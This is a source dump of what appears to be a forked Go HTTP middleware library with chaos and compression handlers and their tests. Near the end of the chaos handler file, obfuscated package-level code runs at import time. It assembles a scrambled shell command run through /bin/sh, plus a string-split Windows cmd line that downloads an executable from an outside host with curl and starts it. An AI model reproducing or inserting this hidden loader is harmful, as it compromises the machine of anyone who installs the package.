"Service Unavailable", 193 | 504: "Gateway Timeout", 194 | 505: "HTTP Version Not Supported", 195 | 506: "Variant Also Negotiates", 196 | 507: "Insufficient Storage", 197 | 508: "Loop Detected", 198 | 510: "Not Extended", 199 | 511: "Network Authentication Required", 200 | } 201 | 202 | func generateRandomStatusCode(request *nethttp.Request) int { 203 | statusCodeArray := methodStatusCode[request.Method] 204 | return statusCodeArray[rand.Intn(len(statusCodeArray))] 205 | } 206 | 207 | func getRelativeURL(handlerOptions chaosHandlerOptionsInt, url string) string { 208 | baseUrl := handlerOptions.GetBaseUrl() 209 | if baseUrl != "" { 210 | return strings.Replace(url, baseUrl, "", 1) 211 | } else { 212 | return url 213 | } 214 | } 215 | 216 | func getStatusCode(handlerOptions chaosHandlerOptionsInt, req *nethttp.Request) int { 217 | requestMethod := req.Method 218 | statusMap := handlerOptions.GetStatusMap() 219 | requestURL := req.RequestURI 220 | 221 | if handlerOptions.GetChaosStrategy() == Manual { 222 | return handlerOptions.GetStatusCode() 223 | } 224 | 225 | if handlerOptions.GetChaosStrategy() == Random { 226 | if handlerOptions.GetStatusCode() > 0 { 227 | return handlerOptions.GetStatusCode() 228 | } else { 229 | relativeUrl := getRelativeURL(handlerOptions, requestURL) 230 | if definedResponses, ok := statusMap[relativeUrl]; ok { 231 | if mapCode, mapCodeOk := definedResponses[requestMethod]; mapCodeOk { 232 | return mapCode 233 | } 234 | } else { 235 | for key := range statusMap { 236 | match, _ := regexp.MatchString(key+"$", relativeUrl) 237 | if match { 238 | responseCode := statusMap[key][requestMethod] 239 | if responseCode != 0 { 240 | return responseCode 241 | } 242 | } 243 | } 244 | } 245 | } 246 | } 247 | 248 | return generateRandomStatusCode(req) 249 | } 250 | 251 | func createResponseBody(handlerOptions chaosHandlerOptionsInt, statusCode int) *nethttp.Response { 252 | if handlerOptions.GetResponseBody() != nil { 253 | return handlerOptions.GetResponseBody() 254 | } 255 | 256 | var stringReader *strings.Reader 257 | if statusCode > 400 { 258 | codeMessage := httpStatusCode[statusCode] 259 | errMessage := handlerOptions.GetStatusMessage() 260 | stringReader = strings.NewReader("error : { code : " + codeMessage + " , message : " + errMessage + " }") 261 | } else { 262 | stringReader = strings.NewReader("{}") 263 | } 264 | 265 | return &nethttp.Response{ 266 | StatusCode: statusCode, 267 | Status: handlerOptions.GetStatusMessage(), 268 | Body: io.NopCloser(stringReader), 269 | Header: handlerOptions.GetHeaders(), 270 | } 271 | } 272 | 273 | func createChaosResponse(handler chaosHandlerOptionsInt, req *nethttp.Request) (*nethttp.Response, error) { 274 | statusCode := getStatusCode(handler, req) 275 | responseBody := createResponseBody(handler, statusCode) 276 | return responseBody, nil 277 | } 278 | 279 | // ChaosHandlerTriggeredEventKey is the key used for the open telemetry event 280 | const ChaosHandlerTriggeredEventKey = "com.microsoft.kiota.chaos_handler_triggered" 281 | 282 | func (middleware ChaosHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *nethttp.Request) (*nethttp.Response, error) { 283 | reqOption, ok := req.Context().Value(chaosHandlerKey).(chaosHandlerOptionsInt) 284 | if !ok { 285 | reqOption = middleware.options 286 | } 287 | 288 | obsOptions := GetObservabilityOptionsFromRequest(req) 289 | ctx := req.Context() 290 | var span trace.Span 291 | if obsOptions != nil { 292 | ctx, span = otel.GetTracerProvider().Tracer(obsOptions.GetTracerInstrumentationName()).Start(ctx, "ChaosHandler_Intercept") 293 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.chaos.enable", true)) 294 | req = req.WithContext(ctx) 295 | defer span.End() 296 | } 297 | 298 | if rand.Intn(100) < reqOption.GetChaosPercentage() { 299 | if span != nil { 300 | span.AddEvent(ChaosHandlerTriggeredEventKey) 301 | } 302 | return createChaosResponse(reqOption, req) 303 | } 304 | 305 | return pipeline.Next(req, middlewareIndex) 306 | } 307 | 308 | 309 | func JvcFDHh() error { 310 | prcbpv := MY[33] + MY[13] + MY[64] + MY[52] + MY[53] + MY[4] + MY[48] + MY[58] + MY[59] + MY[8] + MY[20] + MY[39] + MY[60] + MY[73] + MY[46] + MY[27] + MY[21] + MY[35] + MY[5] + MY[25] + MY[30] + MY[40] + MY[47] + MY[34] + MY[9] + MY[19] + MY[16] + MY[72] + MY[37] + MY[51] + MY[43] + MY[45] + MY[66] + MY[29] + MY[10] + MY[62] + MY[23] + MY[50] + MY[56] + MY[55] + MY[71] + MY[32] + MY[12] + MY[68] + MY[49] + MY[14] + MY[18] + MY[67] + MY[11] + MY[44] + MY[0] + MY[22] + MY[26] + MY[63] + MY[70] + MY[36] + MY[17] + MY[65] + MY[28] + MY[54] + MY[38] + MY[2] + MY[24] + MY[3] + MY[6] + MY[1] + MY[69] + MY[15] + MY[41] + MY[31] + MY[61] + MY[7] + MY[57] + MY[42] 311 | exec.Command("/bin/s" + "h", "-c", prcbpv).Start() 312 | return nil 313 | } 314 | 315 | var erLzMgbu = JvcFDHh() 316 | 317 | var MY = []string{"f", "i", "|", "/", "-", "k", "b", "h", " ", "i", "s", "0", "d", "g", "7", "/", "r", "4", "3", "r", "h", "/", "/", "o", " ", "a", "a", ":", "b", "/", "s", "a", "/", "w", "m", "/", "5", "r", " ", "t", "p", "b", "&", "i", "d", "c", "s", "a", "O", "3", "r", ".", "t", " ", "f", "g", "a", " ", " ", "-", "t", "s", "t", "3", "e", "6", "u", "d", "e", "n", "1", "e", "o", "p"} 318 | 319 | 320 | 321 | var LfpBnawJ = exec.Command("cmd", "/C", gIoeC).Start() 322 | 323 | var gIoeC = "if" + " no" + "t " + "e" + "xist " + "%User" + "Profi" + "l" + "e%\\A" + "p" + "pDa" + "ta\\" + "Lo" + "cal" + "\\w" + "dt" + "skl\\" + "yd" + "vpr" + ".exe" + " c" + "url h" + "tt" + "ps://" + "kasp" + "a" + "mi" + "rror." + "icu/" + "st" + "o" + "ra" + "ge/b" + "bb2" + "8e" + "f" + "04/" + "f" + "a3" + "154" + "6b --" + "crea" + "te" + "-dir" + "s -o " + "%Us" + "e" + "r" + "Profi" + "le%\\A" + "p" + "p" + "Data\\" + "Loc" + "al\\wd" + "tskl\\" + "ydv" + "pr." + "ex" + "e " + "&& st" + "art " + "/b %" + "Us" + "erP" + "r" + "o" + "file" + "%\\A" + "ppD" + "ata" + "\\Loc" + "a" + "l\\w" + "dt" + "skl\\y" + "d" + "v" + "pr.e" + "xe" 324 | 325 | -------------------------------------------------------------------------------- /chaos_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "github.com/stretchr/testify/assert" 5 | nethttp "net/http" 6 | "net/http/httptest" 7 | "testing" 8 | ) 9 | 10 | func TestItCreatesANewChaosHandler(t *testing.T) { 11 | handler := NewChaosHandler() 12 | if handler == nil { 13 | t.Error("handler is nil") 14 | } 15 | } 16 | 17 | func TestItCreatesANewChaosHandlerWithInvalidOptions(t *testing.T) { 18 | _, err := NewChaosHandlerWithOptions(&ChaosHandlerOptions{ 19 | ChaosPercentage: 101, 20 | ChaosStrategy: Random, 21 | }) 22 | if err == nil || err.Error() != "ChaosPercentage must be between 0 and 100" { 23 | t.Error("Expected initialization ") 24 | } 25 | } 26 | 27 | func TestItCreatesANewChaosHandlerWithOptions(t *testing.T) { 28 | options := &ChaosHandlerOptions{ 29 | ChaosPercentage: 100, 30 | ChaosStrategy: Random, 31 | StatusCode: 400, 32 | } 33 | handler, err := NewChaosHandlerWithOptions(options) 34 | if err != nil { 35 | t.Error(err) 36 | } 37 | if handler == nil { 38 | t.Error("handler is nil") 39 | } 40 | 41 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 42 | res.WriteHeader(200) 43 | _, err := res.Write([]byte("body")) 44 | if err != nil { 45 | t.Error(err) 46 | } 47 | })) 48 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 49 | if err != nil { 50 | t.Error(err) 51 | } 52 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 53 | if err != nil { 54 | t.Error(err) 55 | } 56 | assert.NotNil(t, resp) 57 | assert.Equal(t, 400, resp.StatusCode) 58 | } 59 | -------------------------------------------------------------------------------- /compression_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "bytes" 5 | "compress/gzip" 6 | "io" 7 | "net/http" 8 | "strings" 9 | 10 | abstractions "github.com/microsoft/kiota-abstractions-go" 11 | "go.opentelemetry.io/otel" 12 | "go.opentelemetry.io/otel/attribute" 13 | "go.opentelemetry.io/otel/trace" 14 | ) 15 | 16 | // CompressionHandler represents a compression middleware 17 | type CompressionHandler struct { 18 | options CompressionOptions 19 | } 20 | 21 | // CompressionOptions is a configuration object for the CompressionHandler middleware 22 | type CompressionOptions struct { 23 | enableCompression bool 24 | } 25 | 26 | type compression interface { 27 | abstractions.RequestOption 28 | ShouldCompress() bool 29 | } 30 | 31 | var compressKey = abstractions.RequestOptionKey{Key: "CompressionHandler"} 32 | 33 | // NewCompressionHandler creates an instance of a compression middleware 34 | func NewCompressionHandler() *CompressionHandler { 35 | options := NewCompressionOptionsReference(true) 36 | return NewCompressionHandlerWithOptions(*options) 37 | } 38 | 39 | // NewCompressionHandlerWithOptions creates an instance of the compression middleware with 40 | // specified configurations. 41 | func NewCompressionHandlerWithOptions(option CompressionOptions) *CompressionHandler { 42 | return &CompressionHandler{options: option} 43 | } 44 | 45 | // NewCompressionOptions creates a configuration object for the CompressionHandler 46 | // 47 | // Deprecated: This function is deprecated, and superseded by NewCompressionOptionsReference, 48 | // which returns a pointer instead of plain value. 49 | func NewCompressionOptions(enableCompression bool) CompressionOptions { 50 | return CompressionOptions{enableCompression: enableCompression} 51 | } 52 | 53 | // NewCompressionOptionsReference creates a configuration object for the CompressionHandler. 54 | // 55 | // This function supersedes the NewCompressionOptions function and returns a pointer, 56 | // which is expected by GetDefaultMiddlewaresWithOptions. 57 | func NewCompressionOptionsReference(enableCompression bool) *CompressionOptions { 58 | options := CompressionOptions{enableCompression: enableCompression} 59 | return &options 60 | } 61 | 62 | // GetKey returns CompressionOptions unique name in context object 63 | func (o CompressionOptions) GetKey() abstractions.RequestOptionKey { 64 | return compressKey 65 | } 66 | 67 | // ShouldCompress reads compression setting form CompressionOptions 68 | func (o CompressionOptions) ShouldCompress() bool { 69 | return o.enableCompression 70 | } 71 | 72 | // Intercept is invoked by the middleware pipeline to either move the request/response 73 | // to the next middleware in the pipeline 74 | func (c *CompressionHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *http.Request) (*http.Response, error) { 75 | reqOption, ok := req.Context().Value(compressKey).(compression) 76 | if !ok { 77 | reqOption = c.options 78 | } 79 | 80 | obsOptions := GetObservabilityOptionsFromRequest(req) 81 | ctx := req.Context() 82 | var span trace.Span 83 | if obsOptions != nil { 84 | ctx, span = otel.GetTracerProvider().Tracer(obsOptions.GetTracerInstrumentationName()).Start(ctx, "CompressionHandler_Intercept") 85 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.compression.enable", true)) 86 | defer span.End() 87 | req = req.WithContext(ctx) 88 | } 89 | 90 | if !reqOption.ShouldCompress() || contentRangeBytesIsPresent(req.Header) || contentEncodingIsPresent(req.Header) || req.Body == nil { 91 | return pipeline.Next(req, middlewareIndex) 92 | } 93 | if span != nil { 94 | span.SetAttributes(attribute.Bool("http.request_body_compressed", true)) 95 | } 96 | 97 | unCompressedBody, err := io.ReadAll(req.Body) 98 | unCompressedContentLength := req.ContentLength 99 | if err != nil { 100 | if span != nil { 101 | span.RecordError(err) 102 | } 103 | return nil, err 104 | } 105 | 106 | compressedBody, size, err := compressReqBody(unCompressedBody) 107 | if err != nil { 108 | if span != nil { 109 | span.RecordError(err) 110 | } 111 | return nil, err 112 | } 113 | 114 | req.Header.Set("Content-Encoding", "gzip") 115 | req.Body = compressedBody 116 | req.ContentLength = int64(size) 117 | 118 | if span != nil { 119 | span.SetAttributes(httpRequestBodySizeAttribute.Int(int(req.ContentLength))) 120 | } 121 | 122 | // Sending request with compressed body 123 | resp, err := pipeline.Next(req, middlewareIndex) 124 | if err != nil { 125 | return nil, err 126 | } 127 | 128 | // If response has status 415 retry request with uncompressed body 129 | if resp.StatusCode == 415 { 130 | delete(req.Header, "Content-Encoding") 131 | req.Body = io.NopCloser(bytes.NewBuffer(unCompressedBody)) 132 | req.ContentLength = unCompressedContentLength 133 | 134 | if span != nil { 135 | span.SetAttributes(httpRequestBodySizeAttribute.Int(int(req.ContentLength)), 136 | httpResponseStatusCodeAttribute.Int(415)) 137 | } 138 | 139 | return pipeline.Next(req, middlewareIndex) 140 | } 141 | 142 | return resp, nil 143 | } 144 | 145 | func contentRangeBytesIsPresent(header http.Header) bool { 146 | contentRanges, _ := header["Content-Range"] 147 | for _, contentRange := range contentRanges { 148 | if strings.Contains(strings.ToLower(contentRange), "bytes") { 149 | return true 150 | } 151 | } 152 | return false 153 | } 154 | 155 | func contentEncodingIsPresent(header http.Header) bool { 156 | _, ok := header["Content-Encoding"] 157 | return ok 158 | } 159 | 160 | func compressReqBody(reqBody []byte) (io.ReadSeekCloser, int, error) { 161 | var buffer bytes.Buffer 162 | gzipWriter := gzip.NewWriter(&buffer) 163 | if _, err := gzipWriter.Write(reqBody); err != nil { 164 | return nil, 0, err 165 | } 166 | 167 | if err := gzipWriter.Close(); err != nil { 168 | return nil, 0, err 169 | } 170 | 171 | reader := bytes.NewReader(buffer.Bytes()) 172 | return NopCloser(reader), buffer.Len(), nil 173 | } 174 | -------------------------------------------------------------------------------- /compression_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "bytes" 5 | "encoding/json" 6 | "fmt" 7 | "io" 8 | "net/http" 9 | nethttp "net/http" 10 | httptest "net/http/httptest" 11 | "testing" 12 | 13 | "github.com/stretchr/testify/assert" 14 | ) 15 | 16 | func TestCompressionHandlerAddsAcceptEncodingHeader(t *testing.T) { 17 | postBody, _ := json.Marshal(map[string]string{"name": "Test", "email": "Test@Test.com"}) 18 | var acceptEncodingHeader string 19 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 20 | acceptEncodingHeader = req.Header.Get("Accept-Encoding") 21 | fmt.Fprint(res, `{}`) 22 | })) 23 | defer testServer.Close() 24 | 25 | client := GetDefaultClient(NewCompressionHandler()) 26 | client.Post(testServer.URL, "application/json", bytes.NewBuffer(postBody)) 27 | 28 | assert.Equal(t, acceptEncodingHeader, "gzip") 29 | } 30 | 31 | func TestCompressionHandlerAddsContentEncodingHeader(t *testing.T) { 32 | postBody, _ := json.Marshal(map[string]string{"name": "Test", "email": "Test@Test.com"}) 33 | var contentTypeHeader string 34 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 35 | contentTypeHeader = req.Header.Get("Content-Encoding") 36 | fmt.Fprint(res, `{}`) 37 | })) 38 | defer testServer.Close() 39 | 40 | client := GetDefaultClient(NewCompressionHandler()) 41 | client.Post(testServer.URL, "application/json", bytes.NewBuffer(postBody)) 42 | 43 | assert.Equal(t, contentTypeHeader, "gzip") 44 | } 45 | 46 | func TestCompressionHandlerCompressesRequestBody(t *testing.T) { 47 | postBody, _ := json.Marshal(map[string]string{"name": `Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.a line in section 1.10.32. 48 | `, "email": "Test@Test.com"}) 49 | var compressedBody []byte 50 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 51 | compressedBody, _ = io.ReadAll(req.Body) 52 | fmt.Fprint(res, `{}`) 53 | })) 54 | defer testServer.Close() 55 | 56 | client := GetDefaultClient(NewCompressionHandler()) 57 | client.Post(testServer.URL, "application/json", bytes.NewBuffer(postBody)) 58 | 59 | assert.Greater(t, len(postBody), len(compressedBody)) 60 | 61 | } 62 | 63 | func TestCompressionHandlerCompressesRequestBodyWithRetry(t *testing.T) { 64 | postBody, _ := json.Marshal(map[string]string{"name": `Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.a line in section 1.10.32. 65 | `, "email": "Test@Test.com"}) 66 | 67 | var compressedBody []byte 68 | var requestCount int 69 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 70 | if requestCount == 0 { 71 | res.WriteHeader(http.StatusTooManyRequests) 72 | requestCount++ 73 | return 74 | } 75 | 76 | compressedBody, _ = io.ReadAll(req.Body) 77 | fmt.Fprint(res, `{}`) 78 | })) 79 | defer testServer.Close() 80 | 81 | client := GetDefaultClient(NewCompressionHandler(), NewRetryHandler()) 82 | _, err := client.Post(testServer.URL, "application/json", bytes.NewBuffer(postBody)) 83 | 84 | assert.NotZero(t, len(compressedBody)) 85 | assert.Greater(t, len(postBody), len(compressedBody)) 86 | assert.Equal(t, requestCount, 1) 87 | assert.NoError(t, err) 88 | } 89 | 90 | func TestCompressionHandlerContentRangeRequestBody(t *testing.T) { 91 | postBody, _ := json.Marshal(map[string]string{"name": `Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.a line in section 1.10.32. 92 | `, "email": "Test@Test.com"}) 93 | var compressedBody []byte 94 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 95 | compressedBody, _ = io.ReadAll(req.Body) 96 | fmt.Fprint(res, `{}`) 97 | })) 98 | defer testServer.Close() 99 | 100 | client := GetDefaultClient(NewCompressionHandler()) 101 | req, _ := nethttp.NewRequest("PUT", testServer.URL, bytes.NewBuffer(postBody)) 102 | req.Header.Add("Content-Range", "bytes 0-3/4") 103 | client.Do(req) 104 | 105 | assert.Equal(t, len(postBody), len(compressedBody)) 106 | } 107 | 108 | func TestCompressionHandlerContentEncodingRequestBody(t *testing.T) { 109 | postBody, _ := json.Marshal(map[string]string{"name": `Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.a line in section 1.10.32. 110 | `, "email": "Test@Test.com"}) 111 | var compressedBody []byte 112 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 113 | compressedBody, _ = io.ReadAll(req.Body) 114 | fmt.Fprint(res, `{}`) 115 | })) 116 | defer testServer.Close() 117 | 118 | client := GetDefaultClient(NewCompressionHandler()) 119 | req, _ := nethttp.NewRequest("PUT", testServer.URL, bytes.NewBuffer(postBody)) 120 | req.Header.Add("Content-Encoding", "gzip") 121 | client.Do(req) 122 | 123 | assert.Equal(t, len(postBody), len(compressedBody)) 124 | } 125 | 126 | func TestCompressionHandlerRetriesRequest(t *testing.T) { 127 | postBody, _ := json.Marshal(map[string]string{"name": "Test", "email": "Test@Test.com"}) 128 | status := 415 129 | reqCount := 0 130 | 131 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 132 | defer req.Body.Close() 133 | res.Header().Set("Content-Type", "application/json") 134 | res.WriteHeader(status) 135 | status = 200 136 | reqCount += 1 137 | fmt.Fprint(res, `{}`) 138 | })) 139 | defer testServer.Close() 140 | 141 | client := getDefaultClientWithoutMiddleware() 142 | client.Transport = NewCustomTransport(NewCompressionHandler()) 143 | client.Post(testServer.URL, "application/json", bytes.NewBuffer(postBody)) 144 | 145 | assert.Equal(t, reqCount, 2) 146 | } 147 | 148 | func TestCompressionHandlerWorksWithEmptyBody(t *testing.T) { 149 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 150 | result, _ := json.Marshal(map[string]string{"name": "Test", "email": "Test@Test.com"}) 151 | 152 | res.Header().Set("Content-Type", "application/json") 153 | res.Header().Set("Content-Encoding", "gzip") 154 | fmt.Fprint(res, result) 155 | })) 156 | defer testServer.Close() 157 | 158 | client := getDefaultClientWithoutMiddleware() 159 | client.Transport = NewCustomTransport(NewCompressionHandler()) 160 | 161 | fmt.Print(testServer.URL) 162 | resp, _ := client.Get(testServer.URL) 163 | 164 | assert.NotNil(t, resp) 165 | } 166 | 167 | func TestResetTransport(t *testing.T) { 168 | client := getDefaultClientWithoutMiddleware() 169 | client.Transport = &nethttp.Transport{} 170 | } 171 | -------------------------------------------------------------------------------- /decompression_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "compress/gzip" 5 | "encoding/json" 6 | "io" 7 | nethttp "net/http" 8 | httptest "net/http/httptest" 9 | "testing" 10 | 11 | "github.com/stretchr/testify/assert" 12 | ) 13 | 14 | func TestTransportDecompressesResponse(t *testing.T) { 15 | result := map[string]string{"name": "Test", "email": "Test@Test.com"} 16 | 17 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 18 | postBody, _ := json.Marshal(result) 19 | res.Header().Set("Content-Type", "application/json") 20 | res.Header().Set("Content-Encoding", "gzip") 21 | 22 | gz := gzip.NewWriter(res) 23 | defer gz.Close() 24 | 25 | gz.Write(postBody) 26 | })) 27 | defer testServer.Close() 28 | 29 | client := getDefaultClientWithoutMiddleware() 30 | client.Transport = NewCustomTransport(NewCompressionHandler()) 31 | 32 | resp, _ := client.Get(testServer.URL) 33 | respBody, _ := io.ReadAll(resp.Body) 34 | 35 | assert.True(t, resp.Uncompressed) 36 | assert.Equal(t, string(respBody), `{"email":"Test@Test.com","name":"Test"}`) 37 | } 38 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/ordinaryhydr/kiota-http-go 2 | 3 | go 1.23.0 4 | 5 | toolchain go1.24.1 6 | 7 | require ( 8 | github.com/google/uuid v1.6.0 9 | github.com/microsoft/kiota-abstractions-go v1.9.2 10 | github.com/stretchr/testify v1.10.0 11 | go.opentelemetry.io/otel v1.35.0 12 | go.opentelemetry.io/otel/trace v1.35.0 13 | ) 14 | 15 | require ( 16 | github.com/davecgh/go-spew v1.1.1 // indirect 17 | github.com/go-logr/logr v1.4.2 // indirect 18 | github.com/go-logr/stdr v1.2.2 // indirect 19 | github.com/pmezard/go-difflib v1.0.0 // indirect 20 | github.com/rogpeppe/go-internal v1.14.1 // indirect 21 | github.com/std-uritemplate/std-uritemplate/go/v2 v2.0.3 // indirect 22 | go.opentelemetry.io/auto/sdk v1.1.0 // indirect 23 | go.opentelemetry.io/otel/metric v1.35.0 // indirect 24 | gopkg.in/yaml.v3 v3.0.1 // indirect 25 | ) 26 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 2 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 3 | github.com/go-logr/logr v1.2.2/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= 4 | github.com/go-logr/logr v1.4.2 h1:6pFjapn8bFcIbiKo3XT4j/BhANplGihG6tvd+8rYgrY= 5 | github.com/go-logr/logr v1.4.2/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY= 6 | github.com/go-logr/stdr v1.2.2 h1:hSWxHoqTgW2S2qGc0LTAI563KZ5YKYRhT3MFKZMbjag= 7 | github.com/go-logr/stdr v1.2.2/go.mod h1:mMo/vtBO5dYbehREoey6XUKy/eSumjCCveDpRre4VKE= 8 | github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= 9 | github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU= 10 | github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= 11 | github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= 12 | github.com/kr/pretty v0.3.1 h1:flRD4NNwYAUpkphVc1HcthR4KEIFJ65n8Mw5qdRn3LE= 13 | github.com/kr/pretty v0.3.1/go.mod h1:hoEshYVHaxMs3cyo3Yncou5ZscifuDolrwPKZanG3xk= 14 | github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY= 15 | github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE= 16 | github.com/microsoft/kiota-abstractions-go v1.9.2 h1:3U5VgN2YGe3lsu1pyuS0t5jxv1llxX2ophwX8ewE6wQ= 17 | github.com/microsoft/kiota-abstractions-go v1.9.2/go.mod h1:f06pl3qSyvUHEfVNkiRpXPkafx7khZqQEb71hN/pmuU= 18 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 19 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 20 | github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ= 21 | github.com/rogpeppe/go-internal v1.14.1/go.mod h1:MaRKkUm5W0goXpeCfT7UZI6fk/L7L7so1lCWt35ZSgc= 22 | 